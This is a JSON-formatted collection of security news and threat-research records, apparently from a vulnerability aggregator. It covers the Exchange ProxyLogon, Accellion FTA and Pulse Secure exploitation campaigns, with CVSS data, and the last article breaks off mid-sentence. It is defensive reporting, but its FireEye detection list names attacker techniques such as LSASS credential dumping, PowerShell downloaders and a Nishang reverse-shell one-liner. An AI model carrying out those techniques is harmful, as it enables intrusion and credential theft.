IP Address\n\n| \n\nLast known true: 2021/03/03 21:06 \n \n86.105.18.116\n\n| \n\nNetwork: IP Address\n\n| \n\nLast known true: 2021/03/03 21:39 \n \n#### Detecting the Techniques\n\nFireEye detects this activity across our platforms. The following contains specific detection names that provide an indicator of Exchange Server exploitation or post-exploitation activities we associated with these threat actors.\n\n**_Platform_(s)**\n\n| \n\n**_Detection Name_** \n \n---|--- \n \n * Network Security \n * Email Security \n * Detection On Demand \n * Malware File Scanning \n * Malware File Storage Scanning \n| \n\n * FEC_Trojan_ASPX_Generic_2\n * FE_Webshell_ASPX_Generic_33\n * FEC_APT_Webshell_ASPX_HEARTSHELL_1\n * Exploit.CVE-2021-26855 \n \nEndpoint Security\n\n| \n\n**_Real-Time (IOC)_**\n\n * SUSPICIOUS CODE EXECUTION FROM EXCHANGE SERVER (EXPLOIT)\n * ASPXSPY WEBSHELL CREATION A (BACKDOOR)\n * PROCDUMP ON LSASS.EXE (METHODOLOGY)\n * TASKMGR PROCESS DUMP OF LSASS.EXE A (METHODOLOGY)\n * NISHANG POWERSHELL TCP ONE LINER (BACKDOOR)\n * SUSPICIOUS POWERSHELL USAGE (METHODOLOGY)\n * POWERSHELL DOWNLOADER (METHODOLOGY)\n\n**_Malware Protection (AV/MG)_**\n\n * Trojan.Agent.Hafnium.A\n\n**_Module Coverage_**\n\n * [Process Guard] - prevents dumping of LSASS memory using the procdump utility. \n \nHelix\n\n| \n\n * WINDOWS METHODOLOGY [Unusual Web Server Child Process]\n * MICROSOFT EXCHANGE [Authentication Bypass (CVE-2021-26855)]\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-04T00:00:00", "type": "fireeye", "title": "Detection and Response to Exploitation of Microsoft Exchange Zero-Day Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-04T00:00:00", "id": "FIREEYE:C650A7016EEAD895903FB350719E53E3", "href": "https://www.fireeye.com/blog/threat-research/2021/03/detection-response-to-exploitation-of-microsoft-exchange-zero-day-vulnerabilities.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2022-05-09T12:39:06", "description": "[](<https://thehackernews.com/images/-o4PjWjTeBCk/YDSsM4Y2pnI/AAAAAAAAB3A/s_vIwO-nBdgTSgGdEET9fFhVzK0QVUeuwCLcBGAsYHQ/s0/data-breach.jpg>)\n\nCybersecurity researchers on Monday tied a [string of attacks](<https://thehackernews.com/2021/02/data-breach-exposes-16-million-jobless.html>) targeting Accellion File Transfer Appliance (FTA) servers over the past two months to data theft and extortion campaign orchestrated by a cybercrime group called **UNC2546**.\n\nThe attacks, which began in mid-December 2020, involved exploiting multiple zero-day vulnerabilities in the legacy FTA software to install a new web shell named DEWMODE on victim networks and exfiltrating sensitive data, which was then published on a data leak website operated by the CLOP ransomware gang.\n\nBut in a twist, no ransomware was actually deployed in any of the recent incidents that hit organizations in the U.S., Singapore, Canada, and the Netherlands, with the actors instead resorting to extortion emails to threaten victims into paying bitcoin ransoms.\n\nAccording to [Risky Business](<https://risky.biz/newsletter44/>), some of the companies that have had their data listed on the site include Singapore's telecom provider [SingTel](<https://www.singtel.com/personal/support/about-accellion-security-incident>), the American Bureau of Shipping, law firm [Jones Day](<https://www.wsj.com/articles/hacker-claims-to-have-stolen-files-belonging-to-prominent-law-firm-jones-day-11613514532>), the Netherlands-based [Fugro](<https://www.fugro.com/media-centre/news/fulldetails/2021/02/12/cyber-security-incident-third-party-supplier-of-fugro>), and life sciences company Danaher.\n\n[](<https://thehackernews.com/images/-Q8lPq3Q_3Ak/YDSqVE_QgnI/AAAAAAAAB24/rXciWGBxiEoUYoFwkxwNK4iI-SawG1jkACLcBGAsYHQ/s0/data-theft.jpg>)\n\nFollowing the slew of attacks, Accellion has patched four FTA vulnerabilities that were known to be exploited by the threat actors, in addition to incorporating new monitoring and alerting capabilities to flag any suspicious behavior. The flaws are as follows -\n\n * CVE-2021-27101 - SQL injection via a crafted Host header\n * CVE-2021-27102 - OS command execution via a local web service call\n * CVE-2021-27103 - SSRF via a crafted POST request\n * CVE-2021-27104 - OS command execution via a crafted POST request\n\nFireEye's Mandiant threat intelligence team, which is leading the incident response efforts, is [tracking](<https://www.fireeye.com/blog/threat-research/2021/02/accellion-fta-exploited-for-data-theft-and-extortion.html>) the follow-on extortion scheme under a separate threat cluster it calls UNC2582 despite \"compelling\" overlaps identified between the two sets of malicious activities and previous attacks carried out by a financially motivated hacking group dubbed FIN11.\n\n\"Many of the organizations compromised by UNC2546 were previously targeted by FIN11,\" FireEye said. \"Some UNC2582 extortion emails observed in January 2021 were sent from IP addresses and/or email accounts used by FIN11 in multiple phishing campaigns between August and December 2020.\"\n\nOnce installed, the DEWMODE web shell was leveraged to download files from compromised FTA instances, leading to the victims receiving extortion emails claiming to be from the \"CLOP ransomware team\" several weeks later.\n\nLack of reply in a timely manner would result in additional emails sent to a wider group of recipients in the victim organization as well as its partners containing links to the stolen data, the researchers detailed.\n\nBesides urging its FTA customers to migrate to kiteworks, Accellion [said](<https://www.accellion.com/company/press-releases/accellion-provides-update-to-fta-security-incident-following-mandiants-preliminary-findings/>) fewer than 100 out of 300 total FTA clients were victims of the attack and that less than 25 appear to have suffered \"significant\" data theft.\n\nThe development comes after grocery chain Kroger [disclosed](<https://www.kroger.com/i/accellion-incident>) last week that HR data, pharmacy records, and money services records belonging to some customers might have been compromised as a result of the Accellion incident.\n\nThen earlier today, Transport for New South Wales (TfNSW) became the latest entity to confirm that it had been impacted by the worldwide Accellion data breach.\n\n\"The Accellion system was widely used to share and store files by organisations around the world, including Transport for NSW,\" the Australian agency [said](<https://www.transport.nsw.gov.au/news-and-events/articles/transport-for-nsw-impacted-by-worldwide-accellion-data-breach>). \"Before the attack on Accellion servers was interrupted, some Transport for NSW information was taken.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-23T07:18:00", "type": "thn", "title": "Hackers Exploit Accellion Zero-Days in Recent Data Theft and Extortion Attacks", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104"], "modified": "2021-02-23T08:26:03", "id": "THN:43A16BBDCD3B020E360EE37C48B44088", "href": "https://thehackernews.com/2021/02/hackers-exploit-accellion-zero-days-in.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:01", "description": "[](<https://thehackernews.com/images/-BCVwauxz7O8/YKyosjaDKmI/AAAAAAAACn4/TLH1Bsw4NgwXyHFB5EmU57Aro4WWNwQegCLcBGAsYHQ/s0/pulse-secure-vpn-vulnerability.jpg>)\n\nIvanti, the company behind Pulse Secure VPN appliances, has published a security advisory for a high severity vulnerability that may allow an authenticated remote attacker to execute arbitrary code with elevated privileges.\n\n\"Buffer Overflow in Windows File Resource Profiles in 9.X allows a remote authenticated user with privileges to browse SMB shares to execute arbitrary code as the root user,\" the company [said](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44800>) in an alert published on May 14. \"As of version 9.1R3, this permission is not enabled by default.\"\n\nThe flaw, identified as CVE-2021-22908, has a CVSS score of 8.5 out of a maximum of 10 and impacts Pulse Connect Secure versions 9.0Rx and 9.1Rx. In a report detailing the vulnerability, the CERT Coordination Center said the issue stems from the gateway's ability to connect to Windows file shares through a number of CGI endpoints that could be leveraged to carry out the attack.\n\n\"When specifying a long server name for some SMB operations, the 'smbclt' application may crash due to either a stack buffer overflow or a heap buffer overflow, depending on how long of a server name is specified,\" CERT/CC [detailed](<https://kb.cert.org/vuls/id/667933>) in a vulnerability note published on Monday, adding it was able to trigger the vulnerable code by targeting the CGI script '/dana/fb/smb/wnf.cgi.'\n\nPulse Secure customers are recommended to upgrade to PCS Server version 9.1R.11.5 when it becomes available. In the interim, Ivanti has published a workaround file ('Workaround-2105.xml') that can be imported to disable the Windows File Share Browser feature by adding the vulnerable URL endpoints to a blocklist and thus activate necessary mitigations to protect against this vulnerability.\n\nIt bears noting that users running PCS versions 9.1R11.3 or below would need to import a different file named '[Workaround-2104.xml,](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784/?kA23Z000000boUWSAY>)' necessitating that the PCS system is running 9.1R11.4 before applying the safeguards in 'Workaround-2105.xml.'\n\n[](<https://thehackernews.com/images/-2uTEZxdSTZw/YKypBTo6Q-I/AAAAAAAACoE/B0oJ9iYqOKkxyiyr2rn0S1KzYo5qu3QvgCLcBGAsYHQ/s0/pulse.jpg>)\n\nWhile Ivanti has recommended turning off Windows File Browser on the Admin UI by disabling the option 'Files, Window [sic]' for specific user roles, CERT/CC found the steps were inadequate to protect against the flaw during its testing. \n\n\"The vulnerable CGI endpoints are still reachable in ways that will trigger the 'smbclt' application to crash, regardless of whether the 'Files, Windows' user role is enabled or not,\" it noted.\n\n\"An attacker would need a valid DSID and 'xsauth' value from an authenticated user to successfully reach the vulnerable code on a PCS server that has an open Windows File Access policy.\"\n\nThe disclosure of a new flaw arrives weeks after the Utah-based IT software company [patched](<https://thehackernews.com/2021/05/critical-patch-out-for-month-old-pulse.html>) multiple critical security vulnerabilities in Pulse Connect Secure products, including CVE-2021-22893, CVE-2021-22894, CVE-2021-22899, and CVE-2021-22900, the first of which was found to be actively [exploited in the wild](<https://thehackernews.com/2021/04/warning-hackers-exploit-unpatched-pulse.html>) by at least two different threat actors.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-05-25T07:37:00", "type": "thn", "title": "New High-Severity Vulnerability Reported in Pulse Connect Secure VPN", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-22908"], "modified": "2021-05-25T07:37:19", "id": "THN:FA7EFA3A74BF3490AD84EA169EA6C4CA", "href": "https://thehackernews.com/2021/05/new-high-severity-vulnerability.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:40:09", "description": "[](<https://thehackernews.com/images/-S81ZTpL3VW0/X2CFi_g7l0I/AAAAAAAAAww/bXeyXz56F-0V-P2VhHdoO5qJllbhNqfswCLcBGAsYHQ/s728-e100/hacking.jpg>)\n\nThe US Cybersecurity and Infrastructure Security Agency (CISA) issued a [new advisory](<https://us-cert.cisa.gov/ncas/alerts/aa20-258a>) on Monday about a wave of cyberattacks carried by Chinese nation-state actors targeting US government agencies and private entities. \n \n\"CISA has observed Chinese [Ministry of State Security]-affiliated cyber threat actors operating from the People's Republic of China using commercially available information sources and open-source exploitation tools to target US Government agency networks,\" the cybersecurity agency said. \n \nOver the past 12 months, the victims were identified through sources such as [Shodan](<https://www.shodan.io/>), the Common Vulnerabilities and Exposure ([CVE](<https://cve.mitre.org/>)) database, and the National Vulnerabilities Database (NVD), exploiting the public release of a vulnerability to pick vulnerable targets and further their motives. \n \nBy compromising legitimate websites and leveraging spear-phishing emails with malicious links pointing to attacker-owned sites in order to gain initial access, the Chinese threat actors have deployed open-source tools such as [Cobalt Strike](<https://www.cobaltstrike.com/>), [China Chopper Web Shell](<https://blog.talosintelligence.com/2019/08/china-chopper-still-active-9-years-later.html>), and [Mimikatz](<https://github.com/gentilkiwi/mimikatz>) credential stealer to extract sensitive information from infected systems. \n \nThat's not all. Taking advantage of the fact that organizations aren't quickly mitigating known software vulnerabilities, the state-sponsored attackers are \"targeting, scanning, and probing\" US government networks for unpatched flaws in F5 Networks Big-IP Traffic Management User Interface ([CVE-2020-5902](<https://support.f5.com/csp/article/K52145254>)), Citrix VPN ([CVE-2019-19781](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>)), Pulse Secure VPN ([CVE-2019-11510](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101>)), and Microsoft Exchange Servers ([CVE-2020-0688](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>)) to compromise targets. \n \n\"Cyber threat actors also continue to identify large repositories of credentials that are available on the internet to enable brute-force attacks,\" the agency said. \"While this sort of activity is not a direct result of the exploitation of emergent vulnerabilities, it demonstrates that cyber threat actors can effectively use available open-source information to accomplish their goals.\" \n \nThis is not the first time Chinese actors have worked on behalf of China's MSS to infiltrate various industries across the US and other countries. \n \nIn July, the US Department of Justice (DoJ) [charged two Chinese nationals](<https://thehackernews.com/2020/07/chinese-hackers-covid19.html>) for their alleged involvement in a decade-long hacking spree spanning high tech manufacturing, industrial engineering, defense, educational, gaming software, and pharmaceutical sectors with an aim to steal trade secrets and confidential business information. \n \nBut it's not just China. Earlier this year, Israeli security firm ClearSky uncovered a cyberespionage campaign dubbed \"[Fox Kitten](<https://thehackernews.com/2020/02/iranian-hackers-vpn-vulnerabilities.html>)\" that targeted government, aviation, oil and gas, and security companies by exploiting unpatched VPN vulnerabilities to penetrate and steal information from target companies, prompting CISA to issue [multiple security alerts](<https://thehackernews.com/2020/04/pulse-secure-vpn-vulnerability.html>) urging businesses to secure their VPN environments. \n \nStating that sophisticated cyber threat actors will continue to use open-source resources and tools to single out networks with low-security posture, CISA has recommended organizations to patch [routinely exploited vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a>), and \"audit their configuration and patch management programs to ensure they can track and mitigate emerging threats.\"\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-15T09:14:00", "type": "thn", "title": "CISA: Chinese Hackers Exploiting Unpatched Devices to Target U.S. Agencies", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-0688", "CVE-2020-5902"], "modified": "2020-09-15T09:14:30", "id": "THN:0E6CD47141AAF54903BD6C1F9BD96F44", "href": "https://thehackernews.com/2020/09/chinese-hackers-agencies.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:03", "description": "[](<https://thehackernews.com/images/-9-w9YkXtT5w/YECrmqxcKZI/AAAAAAAAB8c/y1lgP3oxO-sd2Br7Oak7lJXAAcf7EG2XwCLcBGAsYHQ/s0/data-breach.jpg>)\n\nEnterprise cloud security firm **Qualys** has become the latest victim to join a long list of entities to have suffered a data breach after zero-day vulnerabilities in its Accellion File Transfer Appliance (FTA) server were exploited to steal sensitive business documents.\n\nAs proof of access to the data, the cybercriminals behind the recent hacks targeting Accellion FTA servers have shared screenshots of files belonging to the company's customers on a publicly accessible data leak website operated by the CLOP ransomware gang.\n\nConfirming the incident, Qualys Chief Information Security Officer Ben Carr [said](<https://blog.qualys.com/vulnerabilities-research/2021/03/03/qualys-update-on-accellion-fta-security-incident>) a detailed probe \"identified unauthorized access to files hosted on the Accellion FTA server\" located in a DMZ (aka [demilitarized zone](<https://en.wikipedia.org/wiki/DMZ_%28computing%29>)) environment that's segregated from the rest of the internal network.\n\n\"Based on this investigation, we immediately notified the limited number of customers impacted by this unauthorized access,\" Carr added. \"The investigation confirmed that the unauthorized access was limited to the FTA server and did not impact any services provided or access to customer data hosted by the Qualys Cloud Platform.\"\n\nLast month, FireEye's Mandiant threat intelligence team [disclosed](<https://thehackernews.com/2021/02/hackers-exploit-accellion-zero-days-in.html>) details of four zero-day flaws in the FTA application that were exploited by threat actors to mount a wide-ranging data theft and extortion campaign, which involved deploying a web shell called DEWMODE on target networks to exfiltrate sensitive data, followed by sending extortion emails to threaten victims into paying bitcoin ransoms, failing which the stolen data was posted on the data leak site.\n\n[](<https://thehackernews.com/images/-N0_0EMgMeSk/YECsZm15i_I/AAAAAAAAB8o/LpcUVTcjzyw22UE7TTrWXNzJGVpnzURugCLcBGAsYHQ/s0/data.jpg>)\n\nWhile two of the flaws (CVE-2021-27101 and CVE-2021-27104) were [addressed](<https://thehackernews.com/2021/02/data-breach-exposes-16-million-jobless.html>) by Accellion on December 20, 2020, the other two vulnerabilities (CVE-2021-27102 and CVE-2021-27103) were identified earlier this year and fixed on January 25.\n\nQualys said it received an \"integrity alert\" suggesting a possible compromise on December 24, two days after it applied the initial hotfix on December 22. The company didn't say if it received extortion messages in the wake of the breach, but said an investigation into the incident is ongoing.\n\n\"The exploited vulnerabilities were of critical severity because they were subject to exploitation via unauthenticated remote code execution,\" Mandiant [said](<https://www.accellion.com/company/security-updates/mandiant-issues-final-report-regarding-accellion-fta-attack/>) in a security assessment of the FTA software published earlier this week.\n\nAdditionally, Mandiant's source code analysis uncovered two more previously unknown security flaws in the FTA software, both of which have been rectified in a patch (version 9.12.444) released on March 1 \u2014\n\n * **CVE-2021-27730**: An argument injection vulnerability (CVSS score 6.6) accessible only to authenticated users with administrative privileges, and\n * **CVE-2021-27731**: A stored cross-site scripting flaw (CVSS score 8.1) accessible only to regular authenticated users\n\nThe FireEye-owned subsidiary is tracking the exploitation activity and the follow-on extortion scheme under two separate threat clusters it calls UNC2546 and UNC2582, respectively, with overlaps identified between the two groups and previous attacks carried out by a financially motivated threat actor dubbed FIN11. But it is still unclear what connection, if any, the two clusters may have with the operators of Clop ransomware.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-04T09:49:00", "type": "thn", "title": "Extortion Gang Breaches Cybersecurity Firm Qualys Using Accellion Exploit", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104", "CVE-2021-27730", "CVE-2021-27731"], "modified": "2021-03-08T07:30:27", "id": "THN:582576397E2C98200C7C952401392B5B", "href": "https://thehackernews.com/2021/03/extortion-gang-breaches-cybersecurity.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:04", "description": "[](<https://thehackernews.com/images/-LOLhcDcH4Q0/YEX4fZpKfUI/AAAAAAAAB9w/I0oQNqeVV2YmhlyC8lyvV-LztA9giv0vACLcBGAsYHQ/s0/microsoft-exchange-hacking.jpg>)\n\nMicrosoft on Friday warned of active attacks exploiting [unpatched Exchange Servers](<https://thehackernews.com/2021/03/urgent-4-actively-exploited-0-day-flaws.html>) carried out by multiple threat actors, as the hacking campaign is believed to have infected tens of thousands of businesses, government entities in the U.S., Asia, and Europe.\n\nThe company [said](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) \"it continues to see increased use of these vulnerabilities in attacks targeting unpatched systems by multiple malicious actors beyond HAFNIUM,\" signaling an escalation that the breaches are no longer \"limited and targeted\" as was previously deemed.\n\nAccording to independent cybersecurity journalist [Brian Krebs](<https://krebsonsecurity.com/2021/03/at-least-30000-u-s-organizations-newly-hacked-via-holes-in-microsofts-email-software/>), at least 30,000 entities across the U.S. \u2014 mainly small businesses, towns, cities, and local governments \u2014 have been compromised by an \"unusually aggressive\" Chinese group that has set its sights on stealing emails from victim organizations by exploiting previously undisclosed flaws in Exchange Server.\n\nVictims are also being reported from outside the U.S., with email systems belonging to businesses in [Norway](<https://nsm.no/aktuelt/oppdater-microsoft-exchange-snarest>), the [Czech Republic](<https://nukib.cz/cs/infoservis/hrozby/1692-vyjadreni-k-aktualni-situaci/>) and the [Netherlands](<https://www.ncsc.nl/actueel/nieuws/2021/maart/8/40-nl-microsoft-exchange-servers-nog-steeds-kwetsbaar>) impacted in a series of hacking incidents abusing the vulnerabilities. The Norwegian National Security Authority said it has implemented a vulnerability scan of IP addresses in the country to identify vulnerable Exchange servers and \"continuously notify these companies.\"\n\nThe colossal scale of the ongoing offensive against Microsoft's email servers also eclipses the [SolarWinds hacking spree](<https://thehackernews.com/2020/12/nearly-18000-solarwinds-customers.html>) that came to light last December, which is said to have targeted as many as 18,000 customers of the IT management tools provider. But as it was with the SolarWinds hack, the attackers are likely to have only gone after high-value targets based on an initial reconnaissance of the victim machines.\n\n### Unpatched Exchange Servers at Risk of Exploitation\n\nA successful [exploitation of the flaws](<https://unit42.paloaltonetworks.com/microsoft-exchange-server-vulnerabilities/>) allows the adversaries to break into Microsoft Exchange Servers in target environments and subsequently allow the installation of unauthorized web-based backdoors to facilitate long-term access. With multiple threat actors leveraging these zero-day vulnerabilities, the post-exploitation activities are expected to differ from one group to the other based on their motives.\n\nChief among the vulnerabilities is CVE-2021-26855, also called \"ProxyLogon\" (no connection to ZeroLogon), which permits an attacker to bypass the authentication of an on-premises Microsoft Exchange Server that's able to receive untrusted connections from an external source on port 443. This is followed by the exploitation of CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065 post-authentication, allowing the malicious party to gain remote access.\n\nTaiwanese cybersecurity firm Devcore, which began an internal audit of Exchange Server security in October last year, [noted in a timeline](<https://proxylogon.com/>) that it discovered both CVE-2021-26855 and CVE-2021-27065 within a 10-day period between December 10-20, 2020. After chaining these bugs into a workable pre-authentication RCE exploit, the company said it reported the issue to Microsoft on January 5, 2021, suggesting that Microsoft had almost two months to release a fix.\n\n[](<https://thehackernews.com/images/-zR_JCeV5Moo/YEX5KX2rxLI/AAAAAAAAB94/XG6lQGCnfO0ZUBwgiwv9agIbi4TfP1csACLcBGAsYHQ/s0/microsoft-exchange-hacking.jpg>)\n\nThe four security issues in question were eventually [patched by Microsoft](<https://thehackernews.com/2021/03/urgent-4-actively-exploited-0-day-flaws.html>) as part of an emergency out-of-band security update last Tuesday, while warning that \"many nation-state actors and criminal groups will move quickly to take advantage of any unpatched systems.\"\n\nThe fact that Microsoft also patched Exchange Server 2010 suggests that the vulnerabilities have been lurking in the code for more than ten years.\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA), which released an [emergency directive](<https://thehackernews.com/2021/03/cisa-issues-emergency-directive-on-in.html>) warning of \"active exploitation\" of the vulnerabilities, urged government agencies running vulnerable versions of Exchange Server to either update the software or disconnect the products from their networks.\n\n\"CISA is aware of widespread domestic and international exploitation of Microsoft Exchange Server vulnerabilities and urges scanning Exchange Server logs with Microsoft's IoC detection tool to help determine compromise,\" the agency [tweeted](<https://twitter.com/USCERT_gov/status/1368216461571919877>) on March 6.\n\nIt's worth noting that merely installing the patches issued by Microsoft would have no effect on servers that have already been backdoored. Organizations that have been breached to deploy the web shell and other post-exploitation tools continue to remain at risk of future compromise until the artifacts are completely rooted out from their networks.\n\n### Multiple Clusters Spotted\n\nFireEye's Mandiant threat intelligence team [said](<https://www.fireeye.com/blog/threat-research/2021/03/detection-response-to-exploitation-of-microsoft-exchange-zero-day-vulnerabilities.html>) it \"observed multiple instances of abuse of Microsoft Exchange Server within at least one client environment\" since the start of the year. Cybersecurity firm Volexity, one of the firms credited with discovering the flaws, said the intrusion campaigns appeared to have started around January 6, 2021.\n\nNot much is known about the identities of the attackers, except that Microsoft has primarily attributed the exploits with high confidence to a group it calls Hafnium, a skilled government-backed group operating out of China. Mandiant is tracking the intrusion activity in three clusters, UNC2639, UNC2640, and UNC2643, adding it expects the number to increase as more attacks are detected.\n\nIn a statement to [Reuters](<https://www.reuters.com/article/us-usa-cyber-microsoft/more-than-20000-u-s-organizations-compromised-through-microsoft-flaw-source-idUSKBN2AX23U>), a Chinese government spokesman denied the country was behind the intrusions.\n\n\"There are at least five different clusters of activity that appear to be exploiting the vulnerabilities,\" [said](<https://twitter.com/redcanary/status/1368289931970322433>) Katie Nickels, director of threat intelligence at Red Canary, while noting the differences in the techniques and infrastructure from that of the Hafnium actor.\n\nIn one particular instance, the cybersecurity firm [observed](<https://twitter.com/redcanary/status/1367935292724948992>) that some of the customers compromised Exchange servers had been deployed with a crypto-mining software called [DLTminer](<https://www.carbonblack.com/blog/cb-tau-technical-analysis-dltminer-campaign-targeting-corporations-in-asia/>), a malware documented by Carbon Black in 2019.\n\n\"One possibility is that Hafnium adversaries shared or sold exploit code, resulting in other groups being able to exploit these vulnerabilities,\" Nickels said. \"Another is that adversaries could have reverse engineered the patches released by Microsoft to independently figure out how to exploit the vulnerabilities.\"\n\n### Microsoft Issues Mitigation Guidance\n\nAside from rolling out fixes, Microsoft has published new alternative mitigation guidance to help Exchange customers who need more time to patch their deployments, in addition to pushing out a new update for the Microsoft Safety Scanner (MSERT) tool to detect web shells and [releasing a script](<https://github.com/microsoft/CSS-Exchange/tree/main/Security>) for checking HAFNIUM indicators of compromise. They can be found 